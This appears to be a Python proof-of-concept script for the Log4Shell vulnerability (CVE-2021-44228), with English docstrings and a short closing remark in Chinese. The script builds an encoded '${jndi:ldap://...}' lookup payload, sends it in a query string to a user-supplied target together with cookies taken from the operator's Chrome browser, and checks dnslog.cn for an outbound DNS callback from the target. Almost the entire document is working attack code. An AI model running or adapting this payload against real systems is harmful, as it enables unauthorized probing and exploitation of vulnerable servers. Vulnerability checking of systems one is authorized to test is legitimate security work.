Poc_CVE-2021-44228

 1 import requests
 2 from selenium.webdriver import Chrome
 3 from selenium.webdriver.support.ui import WebDriverWait
 4 from selenium.webdriver.common.by import By
 5 import time
 6 import urllib.parse
 7 import browser_cookie3
 8 
 9 
def jndi(dns):
    """Build the ``payload=`` query string carrying a JNDI lookup string that names ``dns``.

    The fixed prefix ``${jndi:ldap://`` and suffix ``/exp}`` are percent-encoded
    with ``urllib.parse.quote``; ``dns`` itself is concatenated unencoded, so a
    DNSLog subdomain (letters, digits, dots) passes through as-is while any other
    character in it would be sent raw.

    Args:
        dns: callback hostname; anything passed is coerced with ``str``.

    Returns:
        ``'payload=' + <encoded lookup string>`` ready to append after ``?``.
    """
    dns = str(dns)
    pay1 = '${jndi:ldap://'
    pay2 = '/exp}'
    # quote() uses safe='/' by default, so the slashes stay literal while the
    # other punctuation in the two fragments is percent-encoded.
    pay_url1 = urllib.parse.quote(pay1)
    pay_url2 = urllib.parse.quote(pay2)
    pay_url = pay_url1 + dns +pay_url2
    payload = 'payload='+str(pay_url)
    return (payload)
19 
def verify(dns):
    """Check the DNSLog records table for an entry containing ``dns`` and print a verdict.

    Relies on the module-level ``driver`` created in the ``__main__`` block (it is
    not a parameter), so this only works when the file is run as a script.
    Fixed ``time.sleep`` waits stand in for an explicit wait; on a slow page the
    XPath lookups raise ``NoSuchElementException`` instead of retrying.

    Args:
        dns: the DNSLog subdomain whose presence in the first record row is tested.

    Note:
        A DNS callback only shows that the target evaluated the lookup string;
        the printed "vulnerable" verdict is an indicator, not a confirmation of
        anything beyond that.
    """
    time.sleep(5)
    # Second button in #content; presumably the "Refresh Record" button — confirm
    # against the live page, the position-based XPath is brittle.
    driver.find_element(By.XPATH, '//*[@id="content"]/button[2]').click()
    time.sleep(5)
    # First cell of the second table row (tr[1] is taken to be the header row —
    # TODO confirm). Raises when the table has no records yet.
    ver = driver.find_element(By.XPATH, '//*[@id="myRecords"]/tbody/tr[2]/td[1]')
    re = dns  # local named like the stdlib module; it is just the search needle
    flag = re in str(ver.text)

    if flag:
        print("It looks likely vulnerable")
    else:
        print("It is strong")
32 
def exploit(url,dns):
    """Send one GET to ``url + '/hello?' + jndi(dns)``, print the body, then call ``verify``.

    Security-relevant detail: ``browser_cookie3.chrome()`` reads the operator's own
    Chrome cookie store from disk and hands the whole jar to ``requests``. The jar
    is domain-matched before sending, but whatever matches ``url`` — which comes
    straight from ``input()`` and is prefixed with plain ``http://`` in
    ``__main__`` — is transmitted to that host unencrypted. Why browser cookies are
    needed at all is not stated; TODO confirm the target actually requires a session.

    The request has no ``timeout``, so an unresponsive host blocks indefinitely.

    Args:
        url: base URL of the form ``http://host:port`` (built in ``__main__``).
        dns: DNSLog subdomain text, passed through to ``jndi`` and ``verify``.
    """
    cookie = browser_cookie3.chrome()
    payload = url+'/hello?'+jndi(dns)
    response = requests.get(url=payload,cookies=cookie)
    print(response.text)
    verify(dns)
39 
if __name__ == '__main__':
    # Target base URL: the scheme is forced to http and the input is not validated
    # (no host/port parsing), so a malformed entry only fails later in requests.
    url = 'http://' + input('Please input your ip:port(such as--127.0.0.1:80):')
    # Module-level browser handle; verify() reads this as a global. It is never
    # closed (no driver.quit()), so the browser is typically left running on exit.
    driver = Chrome()
    driver.get("http://www.dnslog.cn/")
    WebDriverWait(driver, 10).until(lambda d: "DNSLog" in d.title)
    # First button in #content; presumably "Get SubDomain" — confirm against the
    # live page, the position-based XPath is brittle.
    driver.find_element(By.XPATH, '//*[@id="content"]/button[1]').click()
    time.sleep(5)
    # Element showing the issued subdomain; its .text is the callback hostname.
    dns = driver.find_element(By.XPATH, '//*[@id="myDomain"]')

    exploit(url,dns.text)

鄙人才疏学浅(再加上没有申请个人域名,毕竟太贵~),该poc仅限用于安装了chrome的windows系统,并不支持linux等。如果有可用域名的话,将verify里的内容改为对该域名的访问记录检查,然后修改一下main函数,即可同样用于linux~
